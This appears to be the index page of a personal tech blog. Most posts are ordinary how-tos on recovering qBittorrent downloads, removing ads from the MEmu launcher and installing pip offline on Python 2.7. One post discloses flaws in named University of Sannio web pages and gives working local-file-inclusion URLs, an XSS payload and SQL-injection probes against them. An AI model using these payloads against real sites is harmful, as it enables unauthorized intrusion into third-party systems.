Skip to main content

Posts

Recover torrent downloads with crashed qbittorrent.

Sometimes Qbittorrent crashes and does not open for different issues. To try to recover the torrents and the restart the downloads you can go in the   [%userprofile%\]\Appdata|Local\qBittorrent\BT_backup and drag and drop all the files on the Qbittorrent window. It will take care of detecting which are the torrent files and you can re-add them to your list. It will recheck the local files and you don't need to care about the rest. ---- If you have the portable version follow the same procedure going in the path [rootfolder of the portable]\Data\settings\LocalAppData_qBittorrent\BT_backup

2022 - Remove (the too many) Ads from Memu launcher

Simple method Download from pureapk "MEmu Launcher2" ex: MEmu Launcher2_v6.0.9_apkpure.com Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar) Longer method Install "Export Apk" Export the memu launcher2  Install purify https://github.com/echo-devim/purify/raw/master/Purify.apk use purify with the exported memu launcher 2 Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar)      

ding.unisannio.it | local file inclusion, sql injection, xss

  Local file inclusion  http://people.ding.unisannio.it/villano/villano/bibtexbrowser.php?frameset&bib=bibtexbrowser.php http://people.ding.unisannio.it/villano/villano/bibtexbrowser.php?bib=[filename%00] archived: https://archive.ph/wip/bUcUv   XSS http://people.ding.unisannio.it/villano/villano/bibtexbrowser.php?frameset&bib=%3Cimg%20src=/%20onerror=%22alert(1)%22%3E  Archived: https://archive.md/wip/WJf5b  (Guagliunastri. ... a fragol', a limon'! - Un grande il prof. Villano) -----  http://old.ing.unisannio.it/ects/scheda_en.php?1565 we can specify a column with the parameters http://old.ing.unisannio.it/ects/scheda_en.php?studenti archived: https://archive.ph/wip/zKWmP There is a need to bypass the url encoding and we cannot use spaces. --- %'% http://old.ing.unisannio.it/cerca_persone/index.php ---

Install pip and urllib3 on python 2.7 / 2.9 offline (linux or windows)

 Download pip 20.3.4 (latest for 2.x) https://pypi.org/simple/pip/  Decompress the file and then run python setup.py install ----   Download certifi, preferring the whl version that doesn't give a lot of problems You can choose the latest (as long as it works) and then run the following command (the filename depends on what you downloaded): pip install certifi-2021.10.8-py2.py3-none-any.whl https://pypi.org/simple/certifi/   Download certifi, preferring the whl version that doesn't give a lot of problems You can choose the latest (as long as it works) and then run the following command (the filename depends on what you downloaded): pip install setuptools-44.1.1-py2.py3-none-any.whl https://pypi.org/project/setuptools/44.1.1/#files Download certifi, preferring the whl version that doesn't give a lot of problems You can choose the latest (as long as it works) and then run the following command (the filename depends on what you downloaded): pip install urllib3-1.26.7-py...

How to Install pip on Python 2.7 Offline Without get-pip.py: Step-by-Step Guide

How to Install pip on Python 2.7 Offline without get-pip.py If you're using Python 2.7 and need to install pip offline without using get-pip.py, follow these steps: Step 1: Download the pip Package Download the pip package from the official GitHub repository at https://github.com/pypa/pip/tree/20.3.4 . The version 20.3.4 is the latest version that works with Python 2.7.x. Note: You can download the package on any device with internet access and transfer it to the target machine via USB drive, network share, or any other preferred method. Step 2: Extract the Package Once the package has been downloaded, extract it to a folder on the target machine. Note: You can extract the package using any standard archive utility software such as WinZip, WinRAR, 7-Zip, or any other similar tool. Step 3: Install pip After the package has been extracted, open a command prompt or terminal and navigate to the folder containing the extracted files. Run the following command: pyth...